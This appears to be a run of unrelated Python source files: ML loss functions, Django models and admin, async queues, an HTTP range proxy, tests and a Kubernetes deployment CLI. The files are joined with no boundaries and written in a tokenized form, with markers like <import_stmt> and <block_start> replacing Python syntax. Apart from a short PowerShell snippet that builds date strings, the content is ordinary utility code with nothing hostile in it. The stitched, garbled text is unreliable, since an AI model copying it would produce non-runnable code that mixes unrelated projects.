""" @author : <NAME> @date : 1 - 23 - 2021 The loss functions are really simple. You just need to understand whether it is a classification or regression task. All losses will be set in the model.finalize() model. """<import_stmt>numpy<as>np<import_stmt>warnings<import_from_stmt>scipy.special softmax<as>sfmx_indiv<line_sep>warnings.filterwarnings("ignore" category=RuntimeWarning)<class_stmt>Loss<block_start>"""Base loss class."""<def_stmt>__init__ self<block_start>self.SGD=<false><block_end><def_stmt>loss self y y_pred<block_start><pass><block_end><def_stmt>grad self y y_pred<block_start><pass><block_end><block_end><class_stmt>MSE(Loss)<block_start>""" MSE stands for mean-squared error, and its the loss you'll want to use for regression. To set it in the model.finalize() method just do: >>> from sealion import neural_networks as nn >>> model = nn.models.NeuralNetwork(layers_list) >>> model.finalize(loss=nn.loss.MSE(), optimizer=...) and you're all set! """<def_stmt>__init__ self<block_start>super().__init__()<line_sep>self.type_regression=<true><block_end><def_stmt>loss self y y_pred<block_start>error=np.sum(np.power(y_pred-y 2))/(2<times>len(y))<line_sep><return>error<block_end><def_stmt>grad self y y_pred<block_start><return>(y_pred-y)/len(y)<block_end><block_end><def_stmt>softmax x<block_start>softmax_output=np.apply_along_axis(sfmx_indiv 1 x)<line_sep><return>softmax_output<block_end><class_stmt>CrossEntropy(Loss)<block_start>""" This loss function is for classification problems. I know there's a binary log loss and then a multi-category cross entropy loss function for classification, but they're essentially the same thing so I thought using one class would make it easier. Remember to use one-hot encoded data for this to work (check out utils). If you are using this loss function, make sure your last layer is Softmax and vice versa. Otherwise, annoying error messages will occur. To set this in the ``model.finalize()`` method do: >>> from sealion import neural_networks as nn >>> model = nn.models.NeuralNetwork() >>> # ... add the layers ... >>> model.add(nn.layers.Softmax()) # last layer has to be softmax >>> model.finalize(loss=nn.loss.CrossEntropy(), optimizer=...) and that's all there is to it. """<def_stmt>__init__ self<block_start>super().__init__()<line_sep>self.type_regression=<false><block_end><def_stmt>loss self y y_pred<block_start><return>np.sum(y<times>np.log(y_pred+1e-20))/len(y)<block_end># now give the crossentropy loss <def_stmt>grad self y y_pred<block_start>y_pred=softmax(y_pred)<line_sep><return>(y_pred-y)/len(y)<block_end><block_end># give the sexy partial derivative
# Generated by Django 1.10.8 on 2017-10-12 10:35 <import_from_stmt>django.db migrations models<import_stmt>jsonfield.fields<class_stmt>Migration(migrations.Migration)<block_start>initial=<true><line_sep>dependencies=[]<line_sep>operations=[migrations.CreateModel(name='StartEnterpriseDeliveryReceipt' fields=[('id' models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name='ID')) ('sms_id' models.CharField(db_index=<true> max_length=126)) ('message_id' models.CharField(db_index=<true> max_length=126 unique=<true>)) ('received_on' models.DateTimeField(db_index=<true> null=<true>)) ('info' jsonfield.fields.JSONField(default=dict null=<true>)) ] ) ]<block_end>
<import_from_stmt>optparse OptionParser<import_stmt>json<import_stmt>sys<import_stmt>os<line_sep>usage=""" <Script> [Options] [Options] -h, --help Show this help message and exit. -a, --add Goes straight to the add script phase """<line_sep># Load args parser=OptionParser()<line_sep>parser.add_option("-a" "--add" action="store_true" dest="add" help="Goes straight to the add script phase")<line_sep># The database is automatically updated after the PR is merged. # ONLY Use this function if you were asked to, to manually add projects to the database. <def_stmt>add_script <block_start>""" Add a Contributor script through a series of inputs """<line_sep>print("Double check inputs before pressing enter. If one input is incorrect, press CTRL-C and re-run the script")<line_sep>category=input("Enter the category your script belongs to > ")<line_sep>name=input("Enter script title > ")<line_sep>path=input("Enter folder name that contains your script > ")<line_sep>requirements_path=input("Enter requirements.txt path (else none) > ")<line_sep>entry=input("Enter name of the file that runs the script > ")<line_sep>arguments=input("Enter script arguments if needed ( '-' separated + no whitespace) (else none) > ")<line_sep>contributor=input("Enter your GitHub username > ")<line_sep>description=input("Enter a description for your script > ")<line_sep>new_data={category:{name:[path entry arguments requirements_path contributor description]}}<line_sep>data_store=read_data()<try_stmt># If category doesn't exist try will fail and except will ask to add a new category with the project <block_start><if_stmt>data_store[category]# Check for existing category or a new one <block_start>data_store[category].update(new_data[category])# Add script <block_end><block_end><except_stmt><block_start>sure="Y"<line_sep>sure=input("A new category is about to be added. You sure? Y/n > ")<if_stmt>sure.lower()<eq>"y"<or>sure<eq>""<block_start>data_store.update(new_data)# Add new category <block_end><else_stmt><block_start>print("Data wasn't added, please re-run the script and add the correct inputs.")<line_sep>sys.exit(1)<block_end><block_end><with_stmt>open("datastore.json" "w")<as>file<block_start>json.dump(data_store file)<block_end>print("Script added to database")<block_end><def_stmt>read_data <block_start>""" Loads datastore.json """<with_stmt>open("datastore.json" "r")<as>file<block_start>data=json.load(file)<block_end><return>data<block_end><def_stmt>check_data <block_start>""" Validates that all projects exist in the datastore and prints out those that are not in the DB """<line_sep>data=read_data()<line_sep>paths=[]<for_stmt>category data<block_start><for_stmt>project data[category]<block_start>paths.append(data[category][project][0])<block_end><block_end>i=0<line_sep>repo_dir=os.listdir("../")<line_sep>ignore=[".deepsource.toml" ".git" ".github" ".gitignore" "CODE_OF_CONDUCT.md" "CONTRIBUTING.md" "LICENSE" "README.md" "SCRIPTS.md" "script_updater.py" "Template for README.md" "Master Script" ]<for_stmt>element repo_dir<block_start><if_stmt>(<not>element<in>paths)<and>(<not>element<in>ignore)<block_start>print(element)<line_sep>i<augadd>1<block_end><block_end>print(f"Total of {i} non-added projects.")<block_end># Start checkpoint <if_stmt>__name__<eq>"__main__"<block_start>(options args)=parser.parse_args()<line_sep># Inputs add=options.add<if_stmt>add<block_start>add_script()<block_end>#add_script() check_data()<block_end>
buildcode=""" function Get-SystemTime(){ $time_mask = @() $the_time = Get-Date $time_mask += [string]$the_time.Year + "0000" $time_mask += [string]$the_time.Year + [string]$the_time.Month + "00" $time_mask += [string]$the_time.Year + [string]$the_time.Month + [string]$the_time.Day return $time_mask } """<line_sep>callcode=""" $key_combos += ,(Get-SystemTime) """<line_sep>
<import_from_stmt>onnxruntime InferenceSession<import_from_stmt>transformers T5Tokenizer<import_from_stmt>onnxt5.api get_encoder_decoder_tokenizer run_embeddings_text get_sess<line_sep># The easiest way is to use the onnxt5 api and load the default pre-trained version of t5 decoder_sess,encoder_sess,tokenizer=get_encoder_decoder_tokenizer()<line_sep># You can load pre-exported models with get_sess (do note you need the tokenizer you trained also) # decoder_sess, encoder_sess = get_sess(output_path) # You can also load model_data manually: # decoder_sess = InferenceSession('/home/abel/t5-decoder-with-lm-head.onnx') # encoder_sess = InferenceSession('/home/abel/t5-encoder.onnx') # The tokenizer should be the one you trained in the case of fine-tuning # tokenizer = T5Tokenizer.from_pretrained('t5-base') prompt='Listen, <NAME> has come unstuck in time.'<line_sep># To get embeddings you can either use our utility function encoder_embeddings,decoder_embeddings=run_embeddings_text(encoder_sess decoder_sess tokenizer prompt)<line_sep># Or do it manually as follow input_ids=tokenizer.encode(prompt return_tensors='pt').numpy()<line_sep># To generate the encoder's last hidden state encoder_output=encoder_sess.run(<none> {"input_ids":input_ids})[0]<line_sep># To generate the full model's embeddings decoder_output=decoder_sess.run(<none> {"input_ids":input_ids "encoder_hidden_states":encoder_output})[0]<line_sep>
<try_stmt><block_start><import_from_stmt>PIL Image<block_end><except_stmt>ImportError<block_start><import_stmt>Image<block_end><import_from_stmt>django forms<import_from_stmt>django.contrib admin<import_from_stmt>raspberryio.project.models FeaturedProject Project ProjectStep ProjectCategory <class_stmt>FeaturedProjectAdminForm(forms.ModelForm)<block_start><class_stmt>Meta<block_start>model=FeaturedProject<block_end><def_stmt>clean_photo self<block_start>photo=self.cleaned_data.get('photo' <false>)<if_stmt>'photo'<in>self.changed_data<block_start>img=Image.open(photo)<if_stmt>photo.size<g>5<times>1024<times>1024<block_start>error="Photo file too large ( maximum 5MB )"<line_sep><raise>forms.ValidationError(error)<block_end><if_stmt>img.size[0]<l>1252<or>img.size[1]<l>626<block_start>error="Photo dimensions too small ( minimum 1252x626 pixels )"<line_sep><raise>forms.ValidationError(error)<block_end><block_end><return>photo<block_end><block_end><class_stmt>FeaturedProjectAdmin(admin.ModelAdmin)<block_start>model=FeaturedProject<line_sep>form=FeaturedProjectAdminForm<line_sep>list_display=('project' 'featured_start_date')<block_end><class_stmt>ProjectAdminForm(forms.ModelForm)<block_start><class_stmt>Meta<block_start>model=Project<line_sep>fields=('title' 'status' 'publish_date' 'user' 'featured_photo' 'featured_video' 'tldr' 'categories')<block_end><block_end><class_stmt>ProjectStepInline(admin.TabularInline)<block_start>model=ProjectStep<line_sep>extra=1<block_end><class_stmt>ProjectAdmin(admin.ModelAdmin)<block_start>model=Project<line_sep>form=ProjectAdminForm<line_sep>list_display=('title' 'created_datetime' 'admin_thumb')<line_sep>inlines=(ProjectStepInline )<line_sep>raw_id_fields=('user' )<block_end><class_stmt>ProjectCategoryAdmin(admin.ModelAdmin)<block_start>model=ProjectCategory<line_sep>fields=('title' )<block_end>admin.site.register(FeaturedProject FeaturedProjectAdmin)<line_sep>admin.site.register(Project ProjectAdmin)<line_sep>admin.site.register(ProjectCategory ProjectCategoryAdmin)<line_sep>
<import_stmt>asyncio<import_stmt>collections<import_stmt>synapse.exc<as>s_exc<import_stmt>synapse.common<as>s_common<import_stmt>synapse.lib.base<as>s_base<class_stmt>AQueue(s_base.Base)<block_start>''' An async queue with chunk optimized sync compatible consumer. '''<async_keyword><def_stmt>__anit__ self<block_start><await>s_base.Base.__anit__(self)<line_sep>self.fifo=[]<line_sep>self.event=asyncio.Event()<line_sep>self.onfini(self.event.set)<block_end><def_stmt>put self item<block_start>''' Add an item to the queue. '''<if_stmt>self.isfini<block_start><return><false><block_end>self.fifo.append(item)<if_stmt>len(self.fifo)<eq>1<block_start>self.event.set()<block_end><return><true><block_end><async_keyword><def_stmt>slice self# sync interface to the async queue <block_start><if_stmt>len(self.fifo)<eq>0<block_start><await>self.event.wait()<block_end>retn=list(self.fifo)<line_sep>self.fifo.clear()<line_sep>self.event.clear()<line_sep><return>retn<block_end><block_end><class_stmt>Queue<block_start>''' An asyncio Queue with batch methods and graceful close. '''<def_stmt>__init__ self maxsize=<none><block_start>self.q=asyncio.Queue(maxsize=maxsize)<line_sep>self.closed=<false><block_end><async_keyword><def_stmt>close self<block_start><await>self.q.put(s_common.novalu)<line_sep>self.closed=<true><block_end><async_keyword><def_stmt>put self item<block_start><if_stmt>self.closed<block_start>mesg='The Queue has been closed.'<line_sep><raise>s_exc.BadArg(mesg=mesg)<block_end><await>self.q.put(item)<block_end><async_keyword><def_stmt>size self<block_start>size=self.q.qsize()<if_stmt>self.closed<block_start>size<augsub>1<block_end><return>size<block_end><async_keyword><def_stmt>puts self items<block_start><if_stmt>self.closed<block_start>mesg='The Queue has been closed.'<line_sep><raise>s_exc.BadArg(mesg=mesg)<block_end><for_stmt>item items<block_start><await>self.q.put(item)<block_end><block_end><async_keyword><def_stmt>slice self size=1000<block_start><if_stmt>self.closed<and>self.q.qsize()<eq>0<block_start><return><none><block_end>items=[]<line_sep>item=<await>self.q.get()<if_stmt>item<is>s_common.novalu<block_start><return><none><block_end>items.append(item)<line_sep>size<augsub>1<for_stmt>i range(min(size self.q.qsize()))<block_start>item=<await>self.q.get()<if_stmt>item<is>s_common.novalu<block_start><break><block_end>items.append(item)<block_end><return>items<block_end><async_keyword><def_stmt>slices self size=1000<block_start><while_stmt><true><block_start>items=<await>self.slice(size=size)<if_stmt>items<is><none><block_start><return><block_end><yield>items<block_end><block_end><block_end><class_stmt>Window(s_base.Base)<block_start>''' A Queue like object which yields added items. If the queue ever reaches its maxsize, it will be fini()d. On fini(), the Window will continue to yield results until empty and then return. 
'''<async_keyword><def_stmt>__anit__ self maxsize=<none><block_start><await>s_base.Base.__anit__(self)<line_sep>self.maxsize=maxsize<line_sep>self.event=asyncio.Event()<line_sep>self.linklist=collections.deque()<async_keyword><def_stmt>fini <block_start>self.event.set()<block_end>self.onfini(fini)<block_end><async_keyword><def_stmt>__aiter__ self<block_start><while_stmt><true><block_start><if_stmt>self.linklist<block_start><yield>self.linklist.popleft()<line_sep><continue><block_end><if_stmt>self.isfini<block_start><return><block_end>self.event.clear()<line_sep><await>self.event.wait()<block_end><block_end><async_keyword><def_stmt>put self item<block_start>''' Add a single item to the Window. '''<if_stmt>self.isfini<block_start><return><false><block_end>self.linklist.append(item)<line_sep>self.event.set()<if_stmt>self.maxsize<is><not><none><and>len(self.linklist)<ge>self.maxsize<block_start><await>self.fini()<block_end><return><true><block_end><async_keyword><def_stmt>puts self items<block_start>''' Add multiple items to the window. '''<if_stmt>self.isfini<block_start><return><false><block_end>self.linklist.extend(items)<line_sep>self.event.set()<if_stmt>self.maxsize<is><not><none><and>len(self.linklist)<ge>self.maxsize<block_start><await>self.fini()<block_end><return><true><block_end><block_end>
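# Illustrative usage sketch (not part of the original module): drive the batch-oriented
# Queue defined above by enqueueing items, closing it gracefully, and draining in slices.
if __name__ == '__main__':

    async def _demo():
        q = Queue(maxsize=1000)
        await q.puts([0, 1, 2, 3, 4])   # enqueue several items at once
        await q.close()                 # after close(), slices() stops once drained
        async for items in q.slices(size=2):
            print(items)                # -> [0, 1] then [2, 3] then [4]

    asyncio.run(_demo())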
<import_from_stmt>tests.utils assert_output<def_stmt>test_lyx <block_start>assert_output("lyxjinja" "dexy:foo.py|idio:multiply" "<< d['foo.py|idio']['multiply'] >>" ".tex")<block_end>
<import_stmt>torch<class_stmt>BoundingBoxNormalizationHelper<block_start><def_stmt>__init__ self interval range_<block_start><assert_stmt>interval<in>('[)' '[]')<line_sep>self.right_open=(interval<eq>'[)')<assert_stmt>range_[1]<g>range_[0]<line_sep>self.scale=range_[1]-range_[0]<line_sep>self.offset=range_[0]<block_end><def_stmt>normalize_ self bbox:torch.Tensor image_size<block_start><if_stmt>self.right_open<block_start>bbox[<ellipsis> ::2]<augdiv>image_size[0]<line_sep>bbox[<ellipsis> 1::2]<augdiv>image_size[1]<block_end><else_stmt><block_start>bbox[<ellipsis> ::2]<augdiv>(image_size[0]-1)<line_sep>bbox[<ellipsis> 1::2]<augdiv>(image_size[1]-1)<block_end>bbox<augmul>self.scale<line_sep>bbox<augadd>self.offset<line_sep><return>bbox<block_end><def_stmt>normalize self bbox:torch.Tensor image_size<block_start><return>self.normalize_(bbox.clone() image_size)<block_end><def_stmt>denormalize_ self bbox:torch.Tensor image_size<block_start>bbox<augsub>self.offset<line_sep>bbox<augdiv>self.scale<if_stmt>self.right_open<block_start>bbox[<ellipsis> ::2]<augmul>image_size[0]<line_sep>bbox[<ellipsis> 1::2]<augmul>image_size[1]<block_end><else_stmt><block_start>bbox[<ellipsis> ::2]<augmul>(image_size[0]-1)<line_sep>bbox[<ellipsis> 1::2]<augmul>(image_size[1]-1)<block_end><return>bbox<block_end><def_stmt>denormalize self bbox:torch.Tensor image_size<block_start><return>self.denormalize_(bbox.clone() image_size)<block_end><block_end>
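# Illustrative usage sketch (not part of the original module): map pixel box coordinates
# on a 640x480 image into the right-open [0, 1) range and back with the helper above.
if __name__ == '__main__':
    helper = BoundingBoxNormalizationHelper('[)', (0.0, 1.0))
    bbox = torch.tensor([32.0, 24.0, 320.0, 240.0])   # x1, y1, x2, y2 in pixels
    norm = helper.normalize(bbox, (640, 480))         # -> tensor([0.0500, 0.0500, 0.5000, 0.5000])
    back = helper.denormalize(norm, (640, 480))       # round-trips to the original box
    print(norm, back)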
<import_stmt>asyncio<import_from_stmt>pathlib Path<import_stmt>aiohttp<import_from_stmt>aiohttp web<import_from_stmt>.funnel Funnel<import_from_stmt>.utils HttpRange RangeNotSupportedError convert_unit load_browser_cookies retry <async_keyword><def_stmt>make_response request url block_size piece_size cookies_from use_original_url<block_start>session=request.app['session']<if_stmt>cookies_from<block_start>session.cookie_jar.update_cookies(load_browser_cookies(cookies_from url))<block_end>@retry<async_keyword><def_stmt>get_info <block_start><nonlocal>url<async_keyword><with_stmt>session.head(url allow_redirects=<true>)<as>resp<block_start><if_stmt>resp.headers.get('Accept-Ranges')<ne>'bytes'<block_start><raise>RangeNotSupportedError<block_end><if_stmt><not>use_original_url<block_start>url=resp.url<block_end><return>resp.content_length resp.content_type<block_end><block_end><try_stmt><block_start>content_length,content_type=<await>get_info()<block_end><except_stmt>RangeNotSupportedError<as>exc<block_start>msg=str(exc)<line_sep>print(msg)<line_sep><return>web.Response(status=501 text=msg)<block_end><except_stmt>aiohttp.ClientError<as>exc<block_start>print(exc)<line_sep><return>web.Response(status=exc.status)<block_end>range=request.headers.get('Range')<if_stmt>range<is><none># not a Range request - the whole file <block_start>range=HttpRange(0 content_length-1)<line_sep>resp=web.StreamResponse(status=200 headers={'Content-Length':str(content_length) 'Content-Type':content_type 'Accept-Ranges':'bytes'})<block_end><else_stmt><block_start><try_stmt><block_start>range=HttpRange.from_str(range content_length)<block_end><except_stmt>ValueError<block_start><return>web.Response(status=416 headers={'Content-Range':f'*/{content_length}'})<block_end><else_stmt><block_start>resp=web.StreamResponse(status=206 headers={'Content-Type':content_type 'Content-Range':f'bytes {range.begin}-{range.end}/{content_length}'})<block_end><block_end><if_stmt>request.method<eq>'HEAD'<block_start><return>resp<block_end><await>resp.prepare(request)<async_keyword><with_stmt>Funnel(url range session block_size piece_size )<as>funnel<block_start><try_stmt><block_start><async_keyword><for_stmt>chunk funnel<block_start><await>resp.write(chunk)<block_end><return>resp<block_end><except_stmt>(aiohttp.ClientError RangeNotSupportedError)<as>exc<block_start>print(exc)<line_sep><return>web.Response(status=exc.status)<block_end><except_stmt>asyncio.CancelledError<block_start><raise><block_end><block_end><block_end>ROOT=Path(__file__).parent<async_keyword><def_stmt>index request<block_start><return>web.FileResponse(ROOT/'index.html')<block_end><async_keyword><def_stmt>cli request<block_start>args=request.app['args']<line_sep>url=request.raw_path[1:]<or>args.url<line_sep><return><await>make_response(request url convert_unit(args.block_size) convert_unit(args.piece_size) args.cookies_from args.use_original_url )<block_end><async_keyword><def_stmt>api request<block_start>args=request.app['args']<line_sep>query=request.query<line_sep>block_size=convert_unit(query.get('block_size' args.block_size))<line_sep>piece_size=convert_unit(query.get('piece_size' args.piece_size))<line_sep><return><await>make_response(request query.get('url' args.url) block_size piece_size query.get('cookies_from' args.cookies_from) query.get('use_original_url' args.use_original_url) )<block_end><async_keyword><def_stmt>make_app args<block_start>app=web.Application()<line_sep>app['args']=args<if_stmt>args.url<is><none><block_start>app.router.add_get('/' 
index)<line_sep># app.router.add_static('/static', ROOT / 'static') app.router.add_get('/api' api)<line_sep>app.router.add_get('/{_:https?://.+}' cli)<block_end><else_stmt><block_start>app.router.add_get('/' cli)<line_sep>app.router.add_get('/{_:https?://.+}' cli)<block_end><async_keyword><def_stmt>session app<block_start>app['session']=aiohttp.ClientSession(raise_for_status=<true>)<line_sep><yield><line_sep><await>app['session'].close()<block_end>app.cleanup_ctx.append(session)<line_sep><return>app<block_end>
"""Test Docker API."""<import_stmt>pytest<line_sep>@pytest.mark.asyncio<async_keyword><def_stmt>test_api_docker_info api_client<block_start>"""Test docker info api."""<line_sep>resp=<await>api_client.get("/docker/info")<line_sep>result=<await>resp.json()<assert_stmt>result["data"]["logging"]<eq>"journald"<assert_stmt>result["data"]["storage"]<eq>"overlay2"<assert_stmt>result["data"]["version"]<eq>"1.0.0"<block_end>
<import_stmt>argparse<import_stmt>logging<import_stmt>os<import_stmt>sys<import_from_stmt>kubernetes client<import_from_stmt>kubernetes.config list_kube_config_contexts load_kube_config<import_from_stmt>k8s_handle config<import_from_stmt>k8s_handle settings<import_from_stmt>k8s_handle templating<import_from_stmt>k8s_handle.exceptions ProvisioningError ResourceNotAvailableError<import_from_stmt>k8s_handle.filesystem InvalidYamlError<import_from_stmt>k8s_handle.k8s.deprecation_checker ApiDeprecationChecker<import_from_stmt>k8s_handle.k8s.provisioner Provisioner<import_from_stmt>k8s_handle.k8s.diff Diff<import_from_stmt>k8s_handle.k8s.availability_checker ResourceAvailabilityChecker make_resource_getters_list<line_sep>COMMAND_DEPLOY='deploy'<line_sep>COMMAND_DIFF='diff'<line_sep>COMMAND_DESTROY='destroy'<line_sep>log=logging.getLogger(__name__)<line_sep>logging.basicConfig(level=settings.LOG_LEVEL format=settings.LOG_FORMAT datefmt=settings.LOG_DATE_FORMAT)<def_stmt>handler_deploy args<block_start>_handler_deploy_destroy(args COMMAND_DEPLOY)<block_end><def_stmt>handler_destroy args<block_start>_handler_deploy_destroy(args COMMAND_DESTROY)<block_end><def_stmt>handler_apply args<block_start>_handler_apply_delete(args COMMAND_DEPLOY)<block_end><def_stmt>handler_delete args<block_start>_handler_apply_delete(args COMMAND_DESTROY)<block_end><def_stmt>handler_render args<block_start>context=config.load_context_section(args.get('section'))<line_sep>templating.Renderer(settings.TEMPLATES_DIR args.get('tags') args.get('skip_tags')).generate_by_context(context)<block_end><def_stmt>handler_diff args<block_start>_handler_deploy_destroy(args COMMAND_DIFF)<block_end><def_stmt>_handler_deploy_destroy args command<block_start>context=config.load_context_section(args.get('section'))<line_sep>resources=templating.Renderer(settings.TEMPLATES_DIR args.get('tags') args.get('skip_tags')).generate_by_context(context)<if_stmt>args.get('dry_run')<block_start><return><block_end>_handler_provision(command resources config.PriorityEvaluator(args context os.environ) args.get('use_kubeconfig') args.get('sync_mode') args.get('show_logs'))<block_end><def_stmt>_handler_apply_delete args command<block_start>_handler_provision(command [os.path.join(settings.TEMP_DIR args.get('resource'))] config.PriorityEvaluator(args {} os.environ) args.get('use_kubeconfig') args.get('sync_mode') args.get('show_logs'))<block_end><def_stmt>_handler_provision command resources priority_evaluator use_kubeconfig sync_mode show_logs<block_start>kubeconfig_namespace=<none><if_stmt>priority_evaluator.environment_deprecated()<block_start>log.warning("K8S_HOST and K8S_CA environment variables support is deprecated "<concat>"and will be discontinued in the future. Use K8S_MASTER_URI and K8S_CA_BASE64 instead.")<block_end># INFO rvadim: https://github.com/kubernetes-client/python/issues/430#issuecomment-359483997 <if_stmt>use_kubeconfig<block_start><try_stmt><block_start>load_kube_config()<line_sep>kubeconfig_namespace=list_kube_config_contexts()[1].get('context').get('namespace')<block_end><except_stmt>Exception<as>e<block_start><raise>RuntimeError(e)<block_end><block_end><else_stmt><block_start>client.Configuration.set_default(priority_evaluator.k8s_client_configuration())<block_end>settings.K8S_NAMESPACE=priority_evaluator.k8s_namespace_default(kubeconfig_namespace)<line_sep>log.info('Default namespace "{}"'.format(settings.K8S_NAMESPACE))<if_stmt><not>settings.K8S_NAMESPACE<block_start>log.info("Default namespace is not set. 
"<concat>"This may lead to provisioning error, if namespace is not set for each resource.")<block_end><try_stmt><block_start>deprecation_checker=ApiDeprecationChecker(client.VersionApi().get_code().git_version[1:])<line_sep>available_checker=ResourceAvailabilityChecker(make_resource_getters_list())<for_stmt>resource resources<block_start>deprecation_checker.run(resource)<line_sep>available_checker.run(resource)<block_end><block_end><except_stmt>client.exceptions.ApiException<block_start>log.warning("Error while getting API version, deprecation check will be skipped.")<block_end><if_stmt>command<eq>COMMAND_DIFF<block_start>executor=Diff()<block_end><else_stmt><block_start>executor=Provisioner(command sync_mode show_logs)<block_end><for_stmt>resource resources<block_start>executor.run(resource)<block_end><block_end>parser=argparse.ArgumentParser(description='CLI utility generate k8s resources by templates and apply it to cluster')<line_sep>subparsers=parser.add_subparsers(dest="command")<line_sep>subparsers.required=<true><line_sep>parser_target_config=argparse.ArgumentParser(add_help=<false>)<line_sep>parser_target_config.add_argument('-s' '--section' required=<true> type=str help='Section to deploy from config file')<line_sep>parser_target_config.add_argument('-c' '--config' required=<false> help='Config file, default: config.yaml')<line_sep>parser_target_config.add_argument('--tags' action='append' required=<false> help='Only use templates tagged with these values')<line_sep>parser_target_config.add_argument('--skip-tags' action='append' required=<false> help='Only use templates whose tags do not match these values')<line_sep>parser_target_resource=argparse.ArgumentParser(add_help=<false>)<line_sep>parser_target_resource.add_argument('-r' '--resource' required=<true> type=str help='Resource spec path, absolute (started with slash) or relative from TEMP_DIR')<line_sep>parser_deprecated=argparse.ArgumentParser(add_help=<false>)<line_sep>parser_deprecated.add_argument('--dry-run' required=<false> action='store_true' help='Don\'t run kubectl commands. 
Deprecated, use "k8s-handle template" instead')<line_sep>parser_provisioning=argparse.ArgumentParser(add_help=<false>)<line_sep>parser_provisioning.add_argument('--sync-mode' action='store_true' required=<false> default=<false> help='Turn on sync mode and wait deployment ending')<line_sep>parser_provisioning.add_argument('--tries' type=int required=<false> default=360 help='Count of tries to check deployment status')<line_sep>parser_provisioning.add_argument('--retry-delay' type=int required=<false> default=5 help='Sleep between tries in seconds')<line_sep>parser_provisioning.add_argument('--strict' action='store_true' required=<false> help='Check existence of all env variables in config.yaml and stop if var is not set')<line_sep>parser_provisioning.add_argument('--use-kubeconfig' action='store_true' required=<false> help='Try to use kube config')<line_sep>parser_provisioning.add_argument('--k8s-handle-debug' action='store_true' required=<false> help='Show K8S client debug messages')<line_sep>parser_logs=argparse.ArgumentParser(add_help=<false>)<line_sep>parser_logs.add_argument('--show-logs' action='store_true' required=<false> default=<false> help='Show logs for jobs')<line_sep>parser_logs.add_argument('--tail-lines' type=int required=<false> help='Lines of recent log file to display')<line_sep>arguments_connection=parser_provisioning.add_argument_group()<line_sep>arguments_connection.add_argument('--k8s-master-uri' required=<false> help='K8S master to connect to')<line_sep>arguments_connection.add_argument('--k8s-ca-base64' required=<false> help='base64-encoded K8S certificate authority')<line_sep>arguments_connection.add_argument('--k8s-token' required=<false> help='K8S token to use')<line_sep>parser_deploy=subparsers.add_parser('deploy' parents=[parser_provisioning parser_target_config parser_logs parser_deprecated] help='Do attempt to create specs from templates and deploy K8S resources of the selected section')<line_sep>parser_deploy.set_defaults(func=handler_deploy)<line_sep>parser_apply=subparsers.add_parser('apply' parents=[parser_provisioning parser_target_resource parser_logs] help='Do attempt to deploy K8S resource from the existing spec')<line_sep>parser_apply.set_defaults(func=handler_apply)<line_sep>parser_destroy=subparsers.add_parser('destroy' parents=[parser_provisioning parser_target_config parser_deprecated] help='Do attempt to destroy K8S resources of the selected section')<line_sep>parser_destroy.set_defaults(func=handler_destroy)<line_sep>parser_delete=subparsers.add_parser('delete' parents=[parser_provisioning parser_target_resource] help='Do attempt to destroy K8S resource from the existing spec')<line_sep>parser_delete.set_defaults(func=handler_delete)<line_sep>parser_template=subparsers.add_parser('render' parents=[parser_target_config] help='Make resources from the template and config. 
'<concat>'Created resources will be placed into the TEMP_DIR')<line_sep>parser_template.set_defaults(func=handler_render)<line_sep>parser_diff=subparsers.add_parser('diff' parents=[parser_target_config] help='Show diff between current rendered yamls and apiserver yamls')<line_sep>parser_diff.add_argument('--use-kubeconfig' action='store_true' required=<false> help='Try to use kube config')<line_sep>parser_diff.set_defaults(func=handler_diff)<def_stmt>main # INFO furiousassault: backward compatibility rough attempt # must be removed later according to https://github.com/2gis/k8s-handle/issues/40 <block_start>deprecation_warnings=0<line_sep>filtered_arguments=[]<for_stmt>argument sys.argv[1:]<block_start><if_stmt>argument<in>['--sync-mode=true' '--sync-mode=True' '--dry-run=true' '--dry-run=True']<block_start>deprecation_warnings<augadd>1<line_sep>filtered_arguments.append(argument.split('=')[0])<line_sep><continue><block_end><if_stmt>argument<in>['--sync-mode=false' '--sync-mode=False' '--dry-run=false' '--dry-run=False']<block_start>deprecation_warnings<augadd>1<line_sep><continue><block_end>filtered_arguments.append(argument)<block_end>args,unrecognized_args=parser.parse_known_args(filtered_arguments)<if_stmt>deprecation_warnings<or>unrecognized_args<block_start>log.warning("Explicit true/false arguments to --sync-mode and --dry-run keys are deprecated "<concat>"and will be discontinued in the future. Use these keys without arguments instead.")<block_end>args_dict=vars(args)<line_sep>settings.CHECK_STATUS_TRIES=args_dict.get('tries')<line_sep>settings.CHECK_DAEMONSET_STATUS_TRIES=args_dict.get('tries')<line_sep>settings.CHECK_STATUS_TIMEOUT=args_dict.get('retry_delay')<line_sep>settings.CHECK_DAEMONSET_STATUS_TIMEOUT=args_dict.get('retry_delay')<line_sep>settings.GET_ENVIRON_STRICT=args_dict.get('strict')<line_sep>settings.COUNT_LOG_LINES=args_dict.get('tail_lines')<line_sep>settings.CONFIG_FILE=args_dict.get('config')<or>settings.CONFIG_FILE<try_stmt><block_start>args.func(args_dict)<block_end><except_stmt>templating.TemplateRenderingError<as>e<block_start>log.error('Template generation error: {}'.format(e))<line_sep>sys.exit(1)<block_end><except_stmt>InvalidYamlError<as>e<block_start>log.error('{}'.format(e))<line_sep>sys.exit(1)<block_end><except_stmt>RuntimeError<as>e<block_start>log.error('RuntimeError: {}'.format(e))<line_sep>sys.exit(1)<block_end><except_stmt>ResourceNotAvailableError<as>e<block_start>log.error('Resource not available: {}'.format(e))<line_sep>sys.exit(1)<block_end><except_stmt>ProvisioningError<block_start>sys.exit(1)<block_end>print(r''' _(_)_ wWWWw _ @@@@ (_)@(_) vVVVv _ @@@@ (___) _(_)_ @@()@@ wWWWw (_)\ (___) _(_)_ @@()@@ Y (_)@(_) @@@@ (___) `|/ Y (_)@(_) @@@@ \|/ (_) / Y \| \|/ /(_) \| |/ | \ | \ |/ | / \ | / \|/ |/ \| \|/ \|// \|/// \|// \|/// \|/// \|// |// \|// ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^''')<block_end>
